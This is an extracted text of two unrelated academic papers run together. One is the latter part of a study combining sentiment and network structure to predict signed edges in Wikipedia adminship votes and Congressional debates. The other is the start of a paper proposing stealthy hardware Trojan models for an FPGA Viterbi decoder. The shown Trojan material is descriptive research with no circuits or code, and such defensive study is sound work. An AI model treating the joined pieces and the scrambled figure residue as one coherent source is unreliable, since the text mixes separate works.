have the advantage that their objective function is convex so that, unlike binary MRFs (as defined by Eq. 1), exact inference is efficient (Bach et al., 2013). We achieve a relaxation by using sums of hinge- loss terms to interpolate c over the continuous do- main [0,1] and d, over [0,1]3 (even though they are defined only for binary domains). As a result, the HL-MRF formulation is equivalent to Eq. 1 when all xe are binary, but it also handles continuous val- ues gracefully. We now interpret a real-valued ‘sign’ xe ∈ [0,1] as the degree to which e is positive. We start by showing how to transform c: even though it could be used in its current form (Eq. 2), we create a tighter relaxation by using c̃(xe, pe) = λ1‖xe − pe‖+ +λ0‖pe −xe‖+, (3) where ‖y‖+ = max{0,y} is the hinge loss. At most one term can be active for any xe ∈ [0,1] due to the hinge loss, and c(xe, pe) = c̃(xe, pe) for binary xe. To rewrite d, notice that, for any xt ∈{0,1}3, we can write d as d(xt) = ∑ z∈{0,1}3 d(z) δ(xt,z), (4) where δ(xt,z) = 1 if xt = z and 0 otherwise. While δ is not convex, we can use f (xt,z) =‖1−‖xt −z‖1‖+ (5) as a convex surrogate. When xt is binary, either xt = z so ‖xt −z‖1 = 0 or xt 6= z so ‖xt −z‖1 ≥ 1, and hence f (xt,z) = δ(xt,z). To prove convexity, note that, for any fixed binary z ∈{0,1}3, ‖x−z‖1 =∑3 i=1 |xi −zi| is linear in x ∈ [0,1] 3, since |xi −zi| equals either xi (if zi = 0) or 1−xi (if zi = 1). It fol- lows that f is a hinge-loss function of a linear trans- formation of xt and therefore convex in xt . Training Testing Evidence To infer RANDOM SAMPLING BFS SAMPLING u v Figure 2: Options for training and testing our model. Requiring the triangle cost d(z) to be nonnegative for all triangle types z ∈{0,1}3, we can use d̃(xt) = ∑ z∈{0,1}3 d(z) f (xt,z) (6) as a convex surrogate for d. Our overall optimization problem is then the following relaxation of Eq. 1: x∗ = arg min x∈[0,1]|E| ∑ e∈E c̃(xe, pe)+ ∑ t∈T d̃(xt). (7) This objective has the exact form of an HL-MRF, since it is a weighted sum of hinge losses of lin- ear functions of x. We use the Probabilistic Soft Logic package2 to perform the optimization, which is in turn based on the alternating-direction method of multipliers (ADMM) (Boyd et al., 2011). Learning. Clearly, a solution is only useful if the cost parameters (λ1, λ0, and d(z) for all z ∈{0,1}3) are set appropriately. One option would be to set the values heuristically, based on the predictions made by the social balance and status theories (Sec. 2.2). However, it is more principled to learn these param- eters from data. For this purpose, we leverage the learning procedures included in the HL-MRF imple- mentation we employ, which uses the voted-percep- tron algorithm to perform maximum-likelihood esti- mation (Bach et al., 2013). Since our data points (edges) interact with each other via the network, some words on how we per- form training and testing are in order. Fig. 2 shows two options for obtaining training and testing sets (we use both options in our experiments). In the ‘random sampling’ paradigm, we randomly choose a set of edges for training (blue), and a disjoint set of edges for testing (yellow). In ‘BFS sampling’, we 2http://psl.umiacs.umd.edu run a breadth-first search from seed node u to obtain a coherent training set (blue), and likewise from a seed node v to obtain a coherent testing set (yellow), taking care that no edges from the training set are also included in the testing set. During both training and testing, an arbitrary por- tion of the edge signs may be fixed to observed val- ues and need not be inferred. These are the solid edges in Fig. 2; we refer to them as evidence. Fur- ther, we define the evidence ratio as the number of evidence edges, divided by the number of all edges considered (solid and dashed). The learning algorithm may use the structure (V and E) of the training graph induced by all blue edges (solid and dashed), the predictions pe of the sentiment model for all blue edges, and the signs of the solid blue edges to predict the dashed blue edges. During testing, the network structure of all yel- low edges, the sentiment predictions for all yellow edges, and the signs of the solid yellow edges may be used to predict the dashed yellow edge signs. In principle, all training edges could be used as extra evidence for testing (i.e., all blue edges may be made solid yellow). However, in our experiments, we keep the training and testing sets fully disjoint. Technical details. For clarity, we give further de- tails. First, the distribution of positive and negative signs may be skewed; e.g., we observe a prior prob- ability of 76% positive signs in our Wikipedia cor- pus (Sec. 4). Therefore, as also done by Bach et al. (2013), we add a cost term to our objective (Eq. 7) that penalizes deviations from this prior probabil- ity (as estimated on the training set). This ensures that the model can default to a reasonable prediction for edges that are not embedded in any triangles and about which the sentiment model is uncertain. Second, intuitively, we should not penalize devi- ating from the sentiment model when it is itself un- certain about its prediction (i.e., when pe is far from both 0 and 1). Rather, we want to rely more heavily on signals from the network structure in such cases. To achieve this, we introduce 10 pairs of cost param- eters (λ(1)1 ,λ (1) 0 ),...,(λ (10) 1 ,λ (10) 0 ). Then, we divide the interval [0,1] into 10 bins, and when pe falls into the i-th bin, we use λ(i)1 and λ (i) 0 in Eq. 3. This way, larger costs can be learned for the extreme bins close to 0 and 1 than for the intermediate bins around 0.5. Finally, hinge-loss terms may optionally be squared in HL-MRFs. We use the squared hinge loss in Eq. 5, since initial experimentation showed this to perform slightly better than the linear hinge loss. 4 Wikipedia experiments Our first set of experiments is conducted on the Wi- kipedia Requests for Adminship corpus, which al- lows us to evaluate our model’s ability to predict person-to-person evaluations in Web texts that are informal but pertain to important social outcomes. 4.1 Dataset description For a Wikipedia editor to become an administrator, a request for adminship (RfA)3 must be submitted, either by the candidate or by another community member. Subsequently, any Wikipedia member may cast a supporting, neutral, or opposing vote. This induces a directed, signed network in which nodes represent Wikipedia members and edges represent votes (we discard neutral votes). We crawled and parsed all votes since the adop- tion of the RfA process in 2003 through May 2013.4 This signed network was previously analyzed by Leskovec et al. (2010b; 2010a). However, there is also a rich textual component that has so far re- mained untapped for edge-sign prediction: each vote is typically accompanied by a short comment (me- dian/mean: 19/34 tokens). A typical positive com- ment reads, ‘I’ve no concerns, will make an excel- lent addition to the admin corps’, while an example of a negative comment is, ‘Little evidence of collab- oration with other editors and limited content cre- ation.’ The presence of a voting network alongside textual edge features makes our method of Sec. 3 well-suited for this dataset. The RfA network contains 11K nodes, 160K edges (76% positive), and close to 1M triangles. 4.2 Experimental setup Train/test sets. We follow the train–test paradigm termed ‘BFS sampling’ in Sec. 3.4 and Fig. 2, choos- ing 10 random seed nodes, from each of which we perform a breadth-first search (following both in- and out-links) until we have visited 350 nodes. We 3http://en.wikipedia.org/wiki/Wikipedia:RfA 4Data available online (West, 2014). thus obtain 10 subgraphs with 350 nodes each. We train a model for each subgraph i and test it on sub- graph i + 1 (mod 10), ensuring that edges from the training graph are removed from the testing graph. The BFS sampling paradigm was used because the alternative (‘random sampling’ in Fig. 2) pro- duces subgraphs with mostly isolated edges and only a few triangles—an unrealistic scenario. Evaluated models. We evaluate three models: 1. A standard, text-based sentiment model that treats edges as independent data points; 2. our full model as specified in Sec. 3.4, which combines edge costs based on the predictions of the text-based sentiment model with triangle costs capturing network context; 3. a version of our model that considers only trian- gle costs, while ignoring the predictions of the text-based sentiment model (akin to the model proposed by Bach et al. (2013)). We refer to these models as ‘sentiment’, ‘combined’, and ‘network’, respectively. Sentiment model. Our text-based sentiment model is an L2-regularized logistic-regression classifier whose features are term frequencies of the 10,000 overall most frequent words. The L2-penalty is cho- sen via cross-validation on the training set. Since comments often explicitly contain the label (‘sup- port’ or ‘oppose’), we remove all words with pre- fixes ‘support’ or ‘oppos’. We train the model only once, on a random sample of 1,000 comments drawn from the set of all 160K comments (the vast majority of which will not appear in our 10 subgraphs). Evidence ratio. Regarding the other two models, recall from Sec. 3.4 our definition of the evidence ratio, the fraction of edge signs that are fixed as evi- dence and need not be inferred. In our experiments, we explore the impact of the evidence ratio during training and testing, since we expect performance to increase as more evidence is available. (We use the same evidence ratio for training and testing, but this need not necessarily be so.) Metrics. As our principal evaluation metrics, we use the areas under the curve (AUC) of the receiver operating characteristic (ROC) curve as well as the precision–recall (PR) curves. There are two PR ● ● ● ● Evidence ratio A re a u n d e r th e c u rv e 1 2 .5 % 2 5 % 5 0 % 7 5 % 0.5 0.6 0.7 0.8 0.9 1.0 ● ● ● ● ● ● ● ● (a) AUC/ROC ● ● ● ● Evidence ratio 1 2 .5 % 2 5 % 5 0 % 7 5 % 0.2 0.4 0.6 0.8 1.0 ● ● ● ● ● ● ● ● Combined Sentiment Network Random (b) AUC/negPR Figure 3: AUC as function of evidence ratio (Wikipedia), with standard errors. curves, one for the positive class, the other for the negative one. Of these two, the positive class is less interesting: due to the class imbalance of 76% posi- tive edges, even a random guesser would achieve an AUC of 0.76. The PR curve of the negative class is more informative: here, it is much harder to achieve high AUC, since random guessing yields only 0.24. Moreover, the negative edges are arguably more im- portant, not only because they are rarer, but also be- cause they indicate tensions in the network, which we might be interested in detecting and resolving. For these reasons, we report only the AUC under the negative PR curve (AUC/negPR) here. Additionally, we report the area under the ROC curve (AUC/ROC), a standard metric for quantify- ing classification performance on unbalanced data. It captures the probability of a random positive test example receiving a higher score than a random neg- ative one (so guessing gives an AUC/ROC of 0.5). 4.3 Results Performance as a function of evidence ratio. The AUCs as functions of the evidence ratio are shown in Fig. 3(a). (We emphasize that these plots are not themselves ROC and PR curves; rather, they are de- rived from those curves by measuring AUC for a range of models, parametrized by evidence ratio.) Since we use the same sentiment model in all cases (Sec. 4.2), its performance (yellow) does not depend on the evidence ratio. It is remarkably high, at an AUC/ROC of 0.88, as a consequence of the highly indicative, sometimes even formulaic, lan- guage used in the comments (examples in Sec. 4.2). The network-only model (blue) works poorly on very little evidence (AUC/ROC 0.56 for 12.5% ev- ● ● ● ● ● ● ● Number of dropped features A re a u n d e r th e c u rv e 0 1 0 5 0 1 0 0 5 0 0 1 0 0 0 2 0 0 0 0.5 0.6 0.7 0.8 0.9 1.0 ● ● ● ● ● ● ● ● ● ● ● ● ● ● (a) AUC/ROC ● ● ● ● ● ● ● Number of dropped features 0 1 0 5 0 1 0 0 5 0 0 1 0 0 0 2 0 0 0 0.2 0.4 0.6 0.8 1.0 ● ● ● ● ● ● ● ● ● ● ● ● ● ● Combined Sentiment Network Random (b) AUC/negPR Figure 4: AUC as function of number of dropped features (Wikipedia), with standard errors. Evidence ratio 75%. idence) but improves steadily as more evidence is used (AUC/ROC 0.82 for 75% evidence): this is in- tuitive, since more evidence means stronger context for each edge sign to be predicted. Although the network-only model works poorly on little evidence, our full model (black), which syn- thesizes the sentiment and network models, is not af- fected by this and effectively defaults to the behavior of the sentiment-only model. Furthermore, although the network-only model never attains the perfor- mance of the sentiment-only model, combining the two in our full model (black) nonetheless yields a small performance boost in terms of AUC/ROC to 0.89 for 75% evidence. The gains are signifi- cantly larger when we consider AUC/negPR instead of AUC/ROC: while the sentiment model achieves 0.60, the combined model improves on this by 13%, to 0.68, at 75% evidence ratio. Performance as a function of sentiment-model quality. It seems hard to improve by much on a sen- timent model that achieves an AUC/ROC of 0.88 on its own; the Wikipedia corpus offers an exception- ally explicit linguistic signal. Hence, in our next ex- periment, we explore systematically how our model behaves under a less powerful sentiment model. First, we measure, for each feature (i.e., word), how informative it is on its own for predicting the signs of edges (quantified by its mutual information with the edge sign), which induces a ranking of fea- tures in terms of informativeness. Now, to make the sentiment model less powerful in a controlled way, we drop the top m features and repeat the experiment described above for a range of m values (where we keep the evidence ratio fixed at 75%). ● ● ● ● ● ● ● ● ● ● 1 e − 0 4 1 e − 0 2 1 e + 0 0 Sentiment−model prediction pe N o rm . co st f o r d e vi a tin g f ro m p e 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1.0 Figure 5: Normalized cost λ(i) (defined in Sec. 4.3; log- arithmic scale) for deviating from sentiment-model pre- dictions pe, for bins i = 1,...,10 (Wikipedia). Upper bin boundaries on the x-axis. Values shown are averages over 10 folds. Evidence ratio 75%. Fig. 4 shows that the performance of the senti- ment model (yellow) declines drastically as more features are removed. The combined model (black), on the contrary, is much less affected: when the per- formance of the sentiment model drops to that of the network-only (blue; ROC/AUC 0.81), the combined model is still stronger than both (0.86). Even as the sentiment model approaches random performance, the combined model still never drops below the net- work-only model—it simply learns to disregard the predictions of the sentiment model altogether. Learned edge costs. Recall from the final part of Sec. 3.4 that each output pe of the sentiment model falls into one of 10 bins [0,0.1],...,[0.9,1], with separate edge-cost parameters λ(i)1 and λ (i) 0 learned for each bucket i. The rationale was to give the model the freedom to trade off edge and triangle costs differently for each edge e, depending on how informative the sentiment model’s prediction pe is. The goal of this section is to understand whether our model indeed exposes such behavior. Recall from Eq. 3 that λ1 is the constant with which the ab- solute difference between pe and the inferred edge sign xe is multiplied when xe > pe, while λ0 is the constant when xe < pe. If pe falls into bin i, the sum λ (i) 1 +λ (i) 0 expresses the cost of deviating from pe in a single number; further, dividing this sum by the sum of all costs (i.e., λ(i)1 and λ (i) 0 for all bins i, plus the costs d(z) of all triangle types z) yields a normalized edge cost for each bin i, which we call λ(i). Fig. 5 plots λ(i) for all bins i = 1,...,10. We ob- serve that deviating from the sentiment model costs more when it makes a strong prediction (i.e., pe S e n t. L O O L O O + S e n t. 0 .0 0 .2 0 .4 0 .6 0 .8 1 .0 Random (a) AUC/ROC S e n t. L O O L O O + S e n t. 0 .0 0 .2 0 .4 0 .6 0 .8 1 .0 Random (b) AUC/negPR Figure 6: Performance in a leave-one-out (LOO) scenario (Wikipedia), with standard errors. For comparison: per- formance of the sentiment model alone. close to 0 or 1) than when it makes a non-informa- tive one (e.g., pe ≈ 0.5). When pe ≈ 1, nearly 100% of the total cost is spent to ensure xe ≈ pe, whereas that fraction is only around 0.1% when pe ≈ 0.6. Leave-one-out setting. Our model predicts many missing edge signs simultaneously, using joint infer- ence. Another scenario was proposed by Leskovec et al. (2010a), who predict signs one at a time, as- suming all other edge signs are known. We call this a leave-one-out (‘LOO’ for short) setting. Assume we want to predict the sign of the edge (u,v) in the LOO setting, and that u, v, and w form a triangle. The type of this triangle can be described by the direc- tions and known polarities of the two edges linking u to w, and v to w, respectively. The edge (u,v) may be embedded in several triangles, and the histogram over their types then serves as the feature vector of (u,v) in a logistic regression; as additional features, counts of u’s positive/negative out-links and v’s pos- itive/negative in-links are used. Since predictions in the LOO setup can draw on the full triangle neighborhood of the edge in ques- tion, we expect it to perform better than the net- work-only model in which edge signs in the triangle neighborhood are often missing. This expectation is confirmed by Fig. 6, which shows that the LOO model (gray) achieves an AUC/ROC (AUC/negPR) of 0.88 (0.63), with the network-only model (Fig. 3) at just 0.82 (0.54) at 75% evidence ratio. However, LOO is outperformed by our combined model incorporating sentiment information (Fig. 3), which attains an AUC/ROC (AUC/negPR) of 0.89 (0.68). Finally, when we add the sentiment predic- tion as another feature to the LOO model (‘LOO + Sent.’ in Fig. 6), we do best, at 0.93 (0.75). To summarize, we make two points: (1) By com- bining sentiment and network features, our model achieves better performance than a network-only model (LOO) that has access to significantly more network information. (2) Incorporating sentiment information helps not only in our setup as described in Sec. 4.2, but also in the previously proposed leave-one-out setup (Leskovec et al., 2010a). 5 U.S. Congress experiments We now evaluate our model in a setting in which the linguistic person-to-person evaluations are less direct and reliable than in the RfA corpus but the signed network is considerably denser. 5.1 Dataset description The ‘Convote’ corpus of Congressional speeches (Thomas et al., 2006) consists of 3,857 speech seg- ments drawn from 53 debates from the U.S. House of Representatives in 2005. There is a mean of 72.8 speech segments per debate and 32.1 speakers per debate. Segments are annotated with the speaker, their party affiliation, the bill discussed, and how the speaker voted on that bill (positive or negative). Thomas et al. (2006) and others represent this cor- pus as a bipartite person–item graph with signed edges from Congresspeople to the bills (items) they spoke about, and they add additional person–person edges encoding who mentioned whom in the speech segments. We take a different perspective, extract- ing from it a dense, undirected person–person graph by linking two Congresspeople if they ever voted on the same bill, labeling the edge as positive if they cast the same vote at least half of the time. We di- rectly use the sentiment model trained by Thomas et al. The resulting graph has 276 nodes, 14,690 edges (54% positive), and 506,327 triangles. 5.2 Experimental setup We split the network G = (V,E) into 5 folds us- ing the ‘random sampling’ technique described in Sec. 3.4 and Fig. 2: the set of nodes V is fixed across all folds, and the set of edges E is partitioned ran- domly so that each fold has 20% of all edges. In the full graph, there is one clique per debate, so each fold contains the overlay of several subgraphs, one per debate and each 20% complete on average. Here, random sampling was used because the al- ternative (‘BFS sampling’ in Fig. 2) would produce nearly complete subgraphs, on which we found the prediction task to be overly easy (since the problem becomes more constrained; Sec. 5.3). We compare the three models also used on the Wikipedia dataset (Sec. 4.2). Our sentiment model comes right out of the box with the Convote cor- pus: Thomas et al. (2006) distribute the text-level scores from their SVM classifier with the corpus, so we simply work with those, after transforming them into probabilities via logistic regression (a standard technique called Platt scaling (Platt, 1999)). Thus, let qu and qv be the probabilistic sentiment predic- tions for u and v on a given bill. The probability that u and v agree on the bill is quqv + (1−qu)(1−qv), and we define the probability pe of a positive sign on the edge e ={u,v} as the average agreement proba- bility over all bills that u and v co-voted on. For instance, the speech containing the sentence, ‘Mr. Speaker, I do rise today in strong support of H.R. 810,’ receives a probability of 98% of express- ing a positive opinion on H.R. (i.e., House of Rep- resentatives) bill 810, whereas the prediction for the speech containing the words, ‘Therefore, I urge my colleagues to vote against both H.R. 810 and H.R. 2520,’ is only 1%. Hence, the edge between the two respective speakers has a probability of 98%×1%+ 2%×99% = 3% of being positive. 5.3 Results Fig. 7 summarizes our results. As in the Wikipedia experiments, we report AUCs as a function of the evidence ratio. The sentiment model alone (yellow) achieves an AUC/ROC (AUC/negPR) of 0.65 (0.62), well above the random baselines at 0.5 (0.46). The network-only model (blue) performs much worse at the start, but it surpasses the sentiment model even with just 12.5% of the edges as evidence, a reflection of the dense, high-quality network structure with many triangles. When we combine the sentiment and network models (black), we consistently see the best results, with the largest gains in the realistic sce- nario where there is little evidence. Eventually, the network-only model catches up to the combined model, simply because it reaches an upper bound on performance given available evi- dence. This owes mainly to the fact that, because we ● ● ● ● ● ● Evidence ratio A re a u n d e r th e c u rv e 5 % 1 0 % 1 2 .5 % 1 5 % 2 0 % 2 5 % 0.5 0.6 0.7 0.8 0.9 1.0 ● ● ● ● ● ● ● ● ● ● ● ● (a) AUC/ROC ● ● ● ● ● ● Evidence ratio 5 % 1 0 % 1 2 .5 % 1 5 % 2 0 % 2 5 % 0.4 0.5 0.6 0.7 0.8 0.9 1.0 ● ● ● ● ● ● ● ● ● ● ● ● Combined Sentiment Network Random (b) AUC/negPR Figure 7: AUC as function of evidence ratio (Convote), with standard errors. derived the person–person signs from person–item signs, only triangles with an even number of nega- tive edges arise with noticeable frequency. To see why, suppose the corpus contained speeches about just one bill. In a triangle consisting of nodes u, v, and w, if u agreed with v and with w, then v and w must agree as well. (The fact that we have multi- ple bills in the corpus opens up the possibility for additional triangle types, but they rarely arise in the data.) This constrains the solution space and makes the problem easier than in the case of Wikipedia, where all triangle types are possible. Our plots so far have summarized precision–recall curves by measuring AUC. Here, it is also informa- tive to inspect a concrete PR curve, as in Fig. 8, which shows all the values at 15% evidence ratio. The network-only model (blue) achieves very high precision up to a recall of about 0.20, where there is a sudden drop. The reason is that, according to the above argument about possible triangle types, the model can be very certain about some edges (e.g., because it is the only non-evidence edge in a tri- angle, making only a single triangle type possible), which causes the plateau for low recall. The com- bined model matches the precision on the plateau, but also maintains significantly higher precision as the network-only model starts to do more poorly: even if an edge e is not fully determined by sur- rounding evidence, the sentiment model might still give strong signals for e itself and its neighbors, such that the above reasoning effectively still applies. 6 Discussion We developed a model that synthesizes textual and social-network information to jointly predict the po- (a) Positive signs (b) Negative signs Figure 8: Precision/recall (Convote, evidence ratio 15%). larity of person-to-person evaluations, and we as- sessed this model in two datasets. Both involve com- munal decision making, where people’s attitudes and opinions of each other have profound social con- sequences, but they are very different. In the Wi- kipedia corpus, the sentiment signal is strong be- cause of established community norms for how to convey one’s opinions, but the network is sparse. In the Convote corpus, the network is determined by fully observed voting patterns, making it strong, but the speech texts themselves only indirectly and nois- ily convey person-to-person opinions. In both cases, our method excels because it is adaptive: it learns from the data how best to combine the two signals. Our model’s adaptivity is important for real-world applications, where one is unlikely to know ahead of time which signals are most trustworthy. We envi- sion the following use-case. One extracts a coherent subgraph of the network of interest, perhaps using one of our sampling methods (Fig. 2) and annotates its edges for their evaluativity. Then, in conjunc- tion with a sentiment model (out-of-the-box or spe- cially trained), one trains our combined model and uses it to predict new edge labels in the network. In this setting, the sentiment model might be unreli- able, and one might have the time and resources to label only a small fraction of the edges. Individually, the network and sentiment models would likely per- form poorly; in bringing the two together, our single model of joint inference could still excel. Acknowledgements. This research has been sup- ported in part by NSF IIS-1016909, CNS-1010921, IIS- 1149837, IIS-1159679; ARO MURI; DARPA SMISC, GRAPHS; ONR N00014-13-1-0287; PayPal; Docomo; and Volkswagen. Robert West has been supported by a Facebook and a Stanford Graduate Fellowship. Edge costs: –1 0 +1 TWO-LEVEL SPIN GLASS TRIANGLE BALANCE v* Figure 9: Reduction from TWO-LEVEL SPIN GLASS to TRIANGLE BALANCE. A Proof sketch of Theorem 1 Due to space constraints, we only give a proof sketch here; the full proof is available online (West, 2014). Proof sketch. By reduction from TWO-LEVEL SPIN GLASS (TLSG), a problem known to be NP-hard (Barahona, 1982). An instance of TLSG consists of vertices V arranged in two 2D grids, one stacked above the other, with edges E between nearest neighbors, and with an edge cost cuv ∈{−1,0,+1} associated with each edge {u,v} (see Fig. 9 for a small instance). Given such an instance, TLSG asks for vertex signs x ∈ {−1,+1}|V| that mini- mize the total energy H(x) = − ∑ {u,v}∈E cuv xu xv. The crucial observation is that TLSG defines ver- tex costs (implicitly all-zero) and edge costs, and asks for vertex signs, whereas TRIANGLE BALANCE defines edge costs and triangle costs, and asks for edge signs. That is, vertices (edges) in TLSG corre- spond to edges (triangles) in TRIANGLE BALANCE, and our proposed reduction transforms an original TLSG instance into a TRIANGLE BALANCE instance in which each edge corresponds to exactly one orig- inal vertex, and each triangle to exactly one original edge. As shown in Fig. 9, which depicts the reduc- tion schematically, this is achieved by introducing a new vertex v∗ that is connected to each original ver- tex and thus creates a triangle for each original edge. The full proof (West, 2014) shows how the edge and triangle costs can be constructed such that each op- timal solution to the TLSG instance corresponds to an optimal solution to the TRIANGLE BALANCE in- stance, and vice versa. References Rakesh Agrawal, Sridhar Rajagopalan, Ramakrishnan Srikant, and Yirong Xu. 2003. Mining newsgroups using networks arising from social behavior. In Proceedings of the 12th International Conference on World Wide Web. Pranav Anand, Marilyn Walker, Rob Abbott, Jean E. Fox Tree, Robeson Bowmani, and Michael Minor. 2011. Cats rule and dogs drool! Classifying stance in online debate. In Proceedings of the 2nd Workshop on Computational Approaches to Subjectivity and Sen- timent Analysis. Stephen Bach, Bert Huang, Ben London, and Lise Getoor. 2013. Hinge-loss Markov random fields: Convex inference for structured prediction. In Pro- ceedings of the 29th Conference on Uncertainty in Ar- tificial Intelligence. Francisco Barahona. 1982. On the computational com- plexity of Ising spin glass models. Journal of Physics A: Mathematical and General, 15(10):3241–3253. John Blitzer, Mark Dredze, and Fernando Pereira. 2007. Biographies, bollywood, boom-boxes and blenders: Domain adaptation for sentiment classification. In Proceedings of the 45th Annual Meeting of the Associ- ation of Computational Linguistics. Stephen Boyd, Neal Parikh, Eric Chu, Borja Peleato, and Jonathan Eckstein. 2011. Distributed optimiza- tion and statistical learning via the alternating direc- tion method of multipliers. Foundations and Trends in Machine Learning, 3(1):1–122. Matthias Broecheler, Lilyana Mihalkova, and Lise Getoor. 2010. Probabilistic similarity logic. In Pro- ceedings of the 26th Conference on Uncertainty in Ar- tificial Intelligence. Dorwin Cartwright and Frank Harary. 1956. Structure balance: A generalization of Heider’s theory. Psycho- logical Review, 63(5):277–293. Robin I. Dunbar. 2004. Gossip in evolutionary perspec- tive. Review of General Psychology, 8(2):100–110. Lisa Feldman Barrett and James A. Russell. 1998. Independence and bipolarity in the structure of af- fect. Journal of Personality and Social Psychology, 74(4):967–984. Fritz Heider. 1946. Attitudes and cognitive organization. The Journal of Psychology, 21(1):107–112. Xia Hu, Lei Tang, Jiliang Tang, and Huan Liu. 2013. Ex- ploiting social relations for sentiment analysis in mi- croblogging. In Proceedings of the 6th ACM Interna- tional Conference on Web Search and Data Mining. Bert Huang, Angelika Kimmig, Lise Getoor, and Jennifer Golbeck. 2013. A flexible framework for probabilis- tic models of social trust. In Proceedings of the 2013 International Social Computing, Behavioral-Cultural Modeling and Prediction Conference. Dan Jurafsky, Victor Chahuneau, Bryan R. Routledge, and Noah A. Smith. 2014. Narrative framing of con- sumer sentiment in online restaurant reviews. First Monday, 19(4–7). Daphne Koller and Nir Friedman. 2009. Probabilistic Graphical Models: Principles and Techniques. MIT Press. Jérôme Kunegis, Julia Preusse, and Felix Schwagereit. 2013. What is the added value of negative links in online social networks? In Proceedings of the 22nd International Conference on World Wide Web. Jure Leskovec, Daniel Huttenlocher, and Jon Kleinberg. 2010a. Predicting positive and negative links in online social networks. In Proceedings of the 19th Interna- tional Conference on World Wide Web. Jure Leskovec, Daniel Huttenlocher, and Jon Kleinberg. 2010b. Signed networks in social media. In Proceed- ings of the SIGCHI Conference on Human Factors in Computing Systems. Wei-Hao Lin, Theresa Wilson, Janyce Wiebe, and Alexander Hauptmann. 2006. Which side are you on? Identifying perspectives at the document and sentence levels. In Proceedings of the 10th Conference on Com- putational Natural Language Learning. Hao Ma, Dengyong Zhou, Chao Liu, Michael R Lyu, and Irwin King. 2011. Recommender systems with social regularization. In Proceedings of the 4th ACM Inter- national Conference on Web Search and Data Mining. Robert Malouf and Tony Mullen. 2008. Taking sides: User classification for informal online political dis- course. Internet Research, 18(2):177–190. Bo Pang and Lillian Lee. 2004. A sentimental education: Sentiment analysis using subjectivity summarization based on minimum cuts. In Proceedings of the 42nd Annual Meeting of the Association for Computational Linguistics. Bo Pang and Lillian Lee. 2008. Opinion mining and sentiment analysis. Foundations and Trends in Infor- mation Retrieval, 2(1):1–135. John Platt. 1999. Probabilistic outputs for support vec- tor machines and comparisons to regularized likeli- hood methods. Advances in Large Margin Classifiers, 10(3):61–74. Marta Recasens, Cristian Danescu-Niculescu-Mizil, and Dan Jurafsky. 2013. Linguistic models for analyzing and detecting biased language. In Proceedings of the 51st Annual Meeting of the Association for Computa- tional Linguistics. David C. Rubin and Jennifer M. Talerico. 2009. A com- parison of dimensional models of emotion. Memory, 17(8):802–808. James A. Russell. 1980. A circumplex model of af- fect. Journal of Personality and Social Psychology, 39(6):1161–1178. Swapna Somasundaran and Janyce Wiebe. 2010. Recog- nizing stances in ideological on-line debates. In Pro- ceedings of the NAACL HLT 2010 Workshop on Com- putational Approaches to Analysis and Generation of Emotion in Text. Chenhao Tan, Lillian Lee, Jie Tang, Long Jiang, Ming Zhou, and Ping Li. 2011. User-level sentiment anal- ysis incorporating social networks. In Proceedings of the 17th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining. Jiliang Tang, Huiji Gao, Xia Hu, and Huan Liu. 2013. Exploiting homophily effect for trust prediction. In Proceedings of the 6th ACM International Conference on Web Search and Data Mining. Matt Thomas, Bo Pang, and Lillian Lee. 2006. Get out the vote: Determining support or opposition from Congressional floor-debate transcripts. In Proceed- ings of the 2006 Conference on Empirical Methods in Natural Language Processing. Robert West. 2014. Supplementary material. Online. http://infolab.stanford.edu/∼west1/TACL2014/. Theresa Wilson, Janyce Wiebe, and Paul Hoffmann. 2005. Recognizing contextual polarity in phrase-level sentiment analysis. In Proceedings of Human Lan- guage Technology Conference and Conference on Em- pirical Methods in Natural Language Processing. Tae Yano, Philip Resnik, and Noah A. Smith. 2010. Shedding (a thousand points of) light on biased lan- guage. In Proceedings of the NAACL-HLT Workshop on Creating Speech and Language Data With Ama- zon’s Mechanical Turk. Bei Yu, Stefan Kaufmann, and Daniel Diermeier. 2008. Classifying party affiliation from political speech. Journal of Information Technology and Pol- itics, 5(1):33–48. work_5mrw3qouhrez7dsxvmhhninjiy ---- A Viterbi decoder and its hardware Trojan models: an FPGA-based implementation study A Viterbi decoder and its hardware Trojan models: an FPGA-based implementation study Varsha Kakkara1,*, Karthi Balasubramanian1, B. Yamuna1, Deepak Mishra2, Karthikeyan Lingasubramanian3 and Senthil Murugan4,* 1 Department of Electronics and Communication Engineering, Amrita School of Engineering, Amrita Vishwa Vidyapeetham, Coimbatore, Tamil Nadu, India 2 Digital Communication Division (DCD), Optical and Digital Communication Group (ODCG), Satcom Navigation Payload Area (SNPA), Space Application Center (SAC), ISRO, Ahmedabad, Gujarat, India 3 Electrical and Computer Engineering, University of Alabama, Birmingham, AL, USA 4 Department of Electronics and Communication Engineering, Amrita School of Engineering, Amrita Vishwa Vidyapeetham, Amritapuri, Kerala, India * These authors contributed equally to this work. ABSTRACT Integrated circuits may be vulnerable to hardware Trojan attacks during its design or fabrication phases. This article is a case study of the design of a Viterbi decoder and the effect of hardware Trojans on a coded communication system employing the Viterbi decoder. Design of a Viterbi decoder and possible hardware Trojan models for the same are proposed. An FPGA-based implementation of the decoder and the associated Trojan circuits have been discussed. The noise-added encoded input data stream is stored in the block RAM of the FPGA and the decoded data stream is monitored on the PC through an universal asynchronous receiver transmitter interface. The implementation results show that there is barely any change in the LUTs used (0.5%) and power dissipation (3%) due to the insertion of the proposed Trojan circuits, thus establishing the surreptitious nature of the Trojan. In spite of the fact that the Trojans cause negligible changes in the circuit parameters, there are significant changes in the bit error rate (BER) due to the presence of Trojans. In the absence of Trojans, BER drops down to zero for signal to noise rations (SNRs) higher than 6 dB, but with the presence of Trojans, BER doesn’t reduce to zero even at a very high SNRs. This is true even with the Trojan being activated only once during the entire duration of the transmission. Subjects Computer Architecture, Mobile and Ubiquitous Computing, Security and Privacy Keywords Coded communication system, Hardware Trojan, Viterbi decoder, Bit error rate INTRODUCTION The entry of connected technologies into the realms of Internet of Things (IoT) and cyber physical systems (CPS) has made it imperative for communications systems to be protected from possible threats. These threats can arise from both software externals and hardware internals. While considerable emphasis is being given to software level threats, in this work we focus on the hardware level threats. The hardware of a communication system can be compromised if its design is exposed so that it can be modified or duplicated. How to cite this article Kakkara V, Balasubramanian K, Yamuna B, Mishra D, Lingasubramanian K, Murugan S. 2020. A Viterbi decoder and its hardware Trojan models: an FPGA-based implementation study. PeerJ Comput. Sci. 6:e250 DOI 10.7717/peerj-cs.250 Submitted 2 May 2019 Accepted 17 December 2019 Published 2 March 2020 Corresponding author Karthi Balasubramanian, b_karthi@cb.amrita.edu Academic editor Miriam Leeser Additional Information and Declarations can be found on page 19 DOI 